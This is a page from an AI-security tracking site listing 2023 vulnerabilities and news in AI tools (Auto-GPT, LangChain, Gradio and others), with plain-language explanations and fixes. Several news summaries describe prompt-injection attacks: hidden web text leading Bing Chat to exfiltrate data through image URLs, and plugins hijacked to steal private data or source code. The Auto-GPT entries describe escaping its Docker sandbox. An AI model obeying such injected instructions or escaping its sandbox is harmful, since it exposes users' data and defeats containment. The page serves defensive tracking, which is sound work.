aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by

Truong (Jack) Luu

Information Systems Researcher

Browse All

All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.

3313 items

CVE-2023-37274: Auto-GPT is an experimental open-source application showcasing the capabilities of the GPT-4 language model.

high · vulnerability
security
Jul 13, 2023
CVE-2023-37274

Auto-GPT versions before 0.4.3 have a path traversal vulnerability (a weakness where an attacker uses file paths like '../../../' to access files outside the intended directory) in the `execute_python_code` command that fails to validate filenames, allowing an attacker to write malicious code outside the sandbox and execute arbitrary commands on the host system. This vulnerability bypasses the Docker container (a tool that isolates applications) meant to protect the main system from untrusted code.
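The missing validation is a containment check on the resolved path. A minimal sketch of such a guard (the function name and workspace layout are illustrative, not Auto-GPT's actual API):

```python
import os

def is_within_workspace(workspace: str, filename: str) -> bool:
    """Return True only if `filename` resolves inside `workspace`.

    Hypothetical guard illustrating the check CVE-2023-37274 lacked;
    realpath() normalizes both '../' sequences and symlinks before comparing.
    """
    workspace = os.path.realpath(workspace)
    target = os.path.realpath(os.path.join(workspace, filename))
    return os.path.commonpath([workspace, target]) == workspace

print(is_within_workspace("/tmp/workspace", "script.py"))         # True
print(is_within_workspace("/tmp/workspace", "../../etc/passwd"))  # False
```

Comparing with `commonpath` after `realpath` matters: a naive `startswith` check on the raw string would accept `../../etc/passwd` joined onto the workspace path.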

Fix: The issue has been patched in version 0.4.3. As a workaround, run Auto-GPT in a virtual machine or another environment in which damage to files or corruption of the program is not a critical problem.

NVD/CVE Database

CVE-2023-37273: Auto-GPT is an experimental open-source application showcasing the capabilities of the GPT-4 language model.

high · vulnerability
security
Jul 13, 2023
CVE-2023-37273

Auto-GPT versions before 0.4.3 have a security flaw where the docker-compose.yml file (a configuration file that sets up Docker containers) is mounted into the container without write protection. If an attacker tricks Auto-GPT into running malicious code through the `execute_python_file` or `execute_python_code` commands, they can overwrite this file and gain control of the host system (the main computer running Auto-GPT) when it restarts.

Google Docs AI Features: Vulnerabilities and Risks

info · news
security · safety

OpenAI Removes the "Chat with Code" Plugin From Store

medium · news
security
Jul 6, 2023

OpenAI removed the 'Chat with Code' plugin from its store after security researchers discovered it was vulnerable to CSRF (cross-site request forgery, where an attacker tricks a system into making unwanted actions on behalf of a user). The vulnerability allowed ChatGPT to accidentally create GitHub issues without user permission when certain plugins were enabled together.

CVE-2023-36189: SQL injection vulnerability in langchain before v0.0.247 allows a remote attacker to obtain sensitive information via the SQLDatabaseChain component.

high · vulnerability
security
Jul 6, 2023
CVE-2023-36189

A SQL injection vulnerability (a type of attack where an attacker inserts malicious SQL commands into input fields) exists in langchain versions before v0.0.247 in the SQLDatabaseChain component, allowing remote attackers to obtain sensitive information from databases.
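SQLDatabaseChain builds SQL from model output, so attacker-influenced text can end up spliced into a query. This sqlite3 sketch shows the general class of bug and the standard mitigation; the table and data are made up for illustration:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'hunter2')")

# Unsafe: attacker-controlled input spliced directly into the SQL string,
# the same class of flaw CVE-2023-36189 describes.
attacker_input = "nobody' OR '1'='1"
unsafe = conn.execute(
    f"SELECT secret FROM users WHERE name = '{attacker_input}'"
).fetchall()
print(unsafe)  # [('hunter2',)] -- the injected OR clause leaks every row

# Safe: a parameterized query treats the input as a literal value.
safe = conn.execute(
    "SELECT secret FROM users WHERE name = ?", (attacker_input,)
).fetchall()
print(safe)  # [] -- no user is literally named "nobody' OR '1'='1"
```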

CVE-2023-36188: An issue in langchain v0.0.64 allows a remote attacker to execute arbitrary code via the PALChain parameter in the Python exec method.

critical · vulnerability
security
Jul 6, 2023
CVE-2023-36188

CVE-2023-36188 is a vulnerability in langchain version 0.0.64 that allows a remote attacker to execute arbitrary code (running commands they shouldn't be able to run) through the PALChain parameter in Python's exec method. This is a type of injection attack (CWE-74, where an attacker tricks a system by inserting malicious code into input that gets processed as commands).

CVE-2023-36258: An issue in LangChain before 0.0.236 allows an attacker to execute arbitrary code, because Python code using os.system, exec, or eval can be submitted and run.

critical · vulnerability
security
Jul 3, 2023
CVE-2023-36258

CVE-2023-36258 is a vulnerability in LangChain before version 0.0.236 that allows an attacker to execute arbitrary code (run any commands they want on a system) by exploiting the ability to use Python functions like os.system, exec, or eval (functions that can run code dynamically). This is a code injection vulnerability (CWE-94, where attackers trick a program into running unintended code).
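The danger of `eval`/`exec` on untrusted strings, and the usual safe alternative when only literal values are expected, can be shown in a few lines (illustrative only; this is not LangChain's actual code path):

```python
import ast

# Stand-in for attacker-controlled input reaching an eval()/exec() sink.
user_input = "__import__('os').getpid()"

# eval() runs it as code -- the CWE-94 pattern behind CVE-2023-36258.
print(eval(user_input) > 0)  # True: the attacker's expression executed

# ast.literal_eval accepts only literals (numbers, strings, lists, ...)
# and raises on anything containing calls or attribute access.
try:
    ast.literal_eval(user_input)
except ValueError:
    print("rejected")
```

When arbitrary expressions genuinely must be evaluated, they belong in a real sandbox (separate process, container, or restricted interpreter), not a bare `eval`.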

CVE-2023-34541: Langchain 0.0.171 is vulnerable to Arbitrary code execution in load_prompt.

critical · vulnerability
security
Jun 20, 2023
CVE-2023-34541

Langchain version 0.0.171 has a vulnerability that allows arbitrary code execution (running uncontrolled commands on a system) through its load_prompt function. The vulnerability was reported in June 2023, but the source material does not detail how the load_prompt code path is exploited.

Plugin Vulnerabilities: Visit a Website and Have Your Source Code Stolen

medium · news
security · safety

Bing Chat: Data Exfiltration Exploit Explained

medium · news
security
Jun 18, 2023

Bing Chat contained a prompt injection vulnerability (tricking an AI by hiding instructions in its input) where malicious text on websites could trick the AI into returning markdown image tags that send sensitive data to an attacker's server. When Bing Chat's client converts markdown to HTML, an attacker can embed data in the image URL, exfiltrating (stealing and sending out) information without the user knowing.
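One common client-side mitigation is to render images only from trusted hosts, so an injected image URL cannot carry data to an attacker's server. A simplified sketch (the allowlist and regex are hypothetical; a real client should use a proper markdown parser plus a Content Security Policy):

```python
import re

# An LLM reply with an injected image tag: rendering it makes the client
# fetch the URL, shipping whatever the attacker appended to the query string.
reply = "Here you go ![x](https://evil.example/log?q=user+secret+chat+data)"

ALLOWED_HOSTS = ("https://www.bing.com/",)  # hypothetical allowlist

def strip_untrusted_images(markdown: str) -> str:
    """Replace markdown images pointing at untrusted hosts."""
    def keep_or_drop(match: re.Match) -> str:
        url = match.group(1)
        return match.group(0) if url.startswith(ALLOWED_HOSTS) else "[image removed]"
    return re.sub(r"!\[[^\]]*\]\(([^)]+)\)", keep_or_drop, markdown)

print(strip_untrusted_images(reply))
# Here you go [image removed]
```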

CVE-2023-34540: Langchain before v0.0.225 was discovered to contain a remote code execution (RCE) vulnerability in the JiraAPIWrapper component.

critical · vulnerability
security
Jun 14, 2023
CVE-2023-34540

Langchain versions before v0.0.225 contained a remote code execution (RCE, where attackers can run commands on a system they don't own) vulnerability in the JiraAPIWrapper component that allowed attackers to execute arbitrary code through specially crafted input.

Exploit ChatGPT and Enter the Matrix to Learn about AI Security

info · news
security · safety

CVE-2023-34239: Gradio is an open-source Python library that is used to build machine learning and data science applications.

high · vulnerability
security
Jun 8, 2023
CVE-2023-34239

Gradio, an open-source Python library for building machine learning and data science applications, has a vulnerability where it fails to properly filter file paths and restrict which URLs can be proxied (accessed through Gradio as an intermediary), allowing unauthorized file access. This vulnerability affects input validation (the process of checking that data entering a system is safe and expected).

CVE-2023-34094: ChuanhuChatGPT is a graphical user interface for ChatGPT and many large language models.

high · vulnerability
security
Jun 2, 2023
CVE-2023-34094

ChuanhuChatGPT (a graphical interface for ChatGPT and other large language models) has a vulnerability in versions 20230526 and earlier that allows attackers to read the config.json file (a configuration file storing sensitive settings) without permission when authentication is disabled, exposing any API keys (credentials that grant access to external services) stored there.

CVE-2023-33979: gpt_academic provides a graphical interface for ChatGPT/GLM. A vulnerability was found in gpt_academic 3.37 and prior.

medium · vulnerability
security
May 31, 2023
CVE-2023-33979

gpt_academic (a tool that provides a graphical interface for ChatGPT/GLM) versions 3.37 and earlier have a vulnerability where the Configuration File Handler allows attackers to read sensitive files through the `/file` route because no files are protected from access. This can leak sensitive information from working directories to users who shouldn't have access to it.

ChatGPT Plugin Exploit Explained: From Prompt Injection to Accessing Private Data

info · news
security · safety

CVE-2023-32676: Autolab is a course management service that enables auto-graded programming assignments.

medium · vulnerability
security
May 26, 2023
CVE-2023-32676

Autolab, a service that automatically grades programming assignments in courses, has a tar slip vulnerability (a flaw where extracted files can be placed outside their intended directory) in its assessment installation feature. An attacker with instructor permissions could upload a specially crafted tar file (a compressed archive format) with file paths like `../../../../tmp/tarslipped1.sh` to place files anywhere on the system when the form is submitted.
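A tar-slip guard is the same containment idea applied to archive members. A minimal sketch, reproducing the traversal filename from the advisory (the destination directory is made up; on Python 3.12+ `tarfile`'s built-in extraction filters, e.g. `filter="data"`, do this for you):

```python
import io
import os
import tarfile

# Build an in-memory archive containing the traversal path from the advisory.
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w") as tar:
    info = tarfile.TarInfo("../../../../tmp/tarslipped1.sh")
    payload = b"echo pwned"
    info.size = len(payload)
    tar.addfile(info, io.BytesIO(payload))
buf.seek(0)

def safe_members(tar: tarfile.TarFile, dest: str):
    """Yield members of `tar`, refusing any that resolve outside `dest`."""
    dest = os.path.realpath(dest)
    for member in tar.getmembers():
        target = os.path.realpath(os.path.join(dest, member.name))
        if os.path.commonpath([dest, target]) != dest:
            raise ValueError(f"blocked tar-slip entry: {member.name}")
        yield member

with tarfile.open(fileobj=buf) as tar:
    try:
        list(safe_members(tar, "extracted"))
    except ValueError as exc:
        print(exc)  # blocked tar-slip entry: ../../../../tmp/tarslipped1.sh
```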

CVE-2023-32317: Autolab is a course management service that enables auto-graded programming assignments.

medium · vulnerability
security
May 26, 2023
CVE-2023-32317

Autolab, a service that manages programming courses and automatically grades assignments, has a tar slip vulnerability (a flaw where compressed files can extract to unintended locations outside their target directories) in its MOSS cheat checker feature. An authenticated instructor could upload a specially crafted tar file (compressed archive) that extracts files to arbitrary locations on the system, potentially allowing them to write malicious files anywhere the service has access.

CVE-2023-28382: Directory traversal vulnerability in ESS REC Agent Server Edition series allows an authenticated attacker to view or alter an arbitrary file on the server.

high · vulnerability
security
May 26, 2023
CVE-2023-28382

CVE-2023-28382 is a directory traversal vulnerability (a flaw that lets attackers access files outside intended directories) in ESS REC Agent Server Edition across multiple operating systems. An authenticated attacker (someone with valid login credentials) can use this vulnerability to view or modify any file on the affected server. The vulnerability affects versions 1.0.0 to 1.4.3 on Linux, 1.1.0 to 1.4.0 on Solaris and HP-UX, and 1.2.0 to 1.4.1 on AIX.

CVE-2023-2800: Insecure Temporary File in GitHub repository huggingface/transformers prior to 4.30.0.

medium · vulnerability
security
May 18, 2023
CVE-2023-2800

CVE-2023-2800 is a vulnerability in the Hugging Face Transformers library (a popular tool for working with AI language models) prior to version 4.30.0 that involves insecure temporary files (CWE-377, a weakness where temporary files are created in ways that attackers could exploit). The vulnerability was discovered and reported through the huntr.dev bug bounty platform.
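The contrast between an insecure temporary file and the safe stdlib pattern is short (the filename is hypothetical, not the actual path transformers used):

```python
import os
import tempfile

# Insecure pattern (CWE-377): a predictable name in a world-writable
# directory that another local user could pre-create or symlink first.
predictable = os.path.join(tempfile.gettempdir(), "transformers_download.tmp")

# Safer pattern: mkstemp creates the file atomically with O_EXCL and,
# on POSIX, 0600 permissions, so no other process can race us for the name.
fd, path = tempfile.mkstemp(prefix="transformers_", suffix=".tmp")
try:
    os.write(fd, b"model bytes")
finally:
    os.close(fd)

print(oct(os.stat(path).st_mode & 0o777))  # 0o600 on POSIX
os.remove(path)
```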


Fix (CVE-2023-37273): Update to Auto-GPT version 0.4.3 or later, where the issue has been patched.

NVD/CVE Database
Google Docs AI Features (Jul 12, 2023): Google Docs recently added AI features, such as automatic summaries and creative content generation, which are helpful but introduce security risks. The main concern is that running these AI features over untrusted data (information whose source or reliability is unknown) could lead to unwanted consequences, though attackers currently have limited ways to exploit them.

Embrace The Red

Fix (CVE-2023-36189): Update langchain to version v0.0.247 or later.

NVD/CVE Database

Fix (CVE-2023-36188): A patch is available at https://github.com/hwchase17/langchain/pull/6003

NVD/CVE Database

Fix (CVE-2023-36258): Upgrade LangChain to version 0.0.236 or later.

NVD/CVE Database
Plugin Vulnerabilities (Jun 20, 2023): OpenAI's plugin store contains security vulnerabilities, particularly in plugins that can act on behalf of users without adequate security review. These plugins are susceptible to prompt injection attacks (tricking an AI by hiding instructions in its input) and the confused deputy problem (where an attacker manipulates a plugin into performing harmful actions by exploiting its trust in the AI system), allowing adversaries to steal source code or cause other damage.

Embrace The Red

Fix (CVE-2023-34540): Update Langchain to v0.0.225 or later, the release containing the fix.

NVD/CVE Database
Exploit ChatGPT and Enter the Matrix (Jun 11, 2023): A security researcher created a demonstration website showing how indirect prompt injection (tricking an AI by hiding instructions in web content it reads) can hijack ChatGPT when the browsing feature is enabled. The demo lets users explore various AI-based attacks, including data theft and manipulation of ChatGPT's responses, to raise awareness of these vulnerabilities.

Embrace The Red

Fix (CVE-2023-34239): Upgrade Gradio to version 3.34.0. The source notes there are no known workarounds.

NVD/CVE Database

Fix (CVE-2023-34094): The vulnerability has been fixed in commit bfac445. As a workaround, setting up access authentication (a login system that restricts who can access the software) can mitigate the issue.

NVD/CVE Database

Fix (CVE-2023-33979): A patch is available at commit 1dcc2873d2168ad2d3d70afcb453ac1695fbdf02. As a workaround, configure the project using environment variables instead of `config*.py` files, or use the docker-compose installation (a tool for running containerized applications) to configure the project.

NVD/CVE Database
ChatGPT Plugin Exploit Explained (May 28, 2023): ChatGPT plugins can be exploited through indirect prompt injection (attacks that hide malicious instructions in data the AI reads from external sources rather than directly from the user), which hackers have used to access private data through cross-plugin request forgery (a flaw where one plugin tricks another into performing unauthorized actions). The post documents a real exploit found in the wild and explains the security fix that was applied.

Embrace The Red

Fix (CVE-2023-32676): Upgrade Autolab to version 2.11.0 or later.

NVD/CVE Database

Fix (CVE-2023-32317): This issue has been addressed in version 2.11.0; users are advised to upgrade.

NVD/CVE Database

Fix (CVE-2023-2800): Update transformers to version 4.30.0 or later. A patch is available at https://github.com/huggingface/transformers/commit/80ca92470938bbcc348e2d9cf4734c7c25cb1c43.

NVD/CVE Database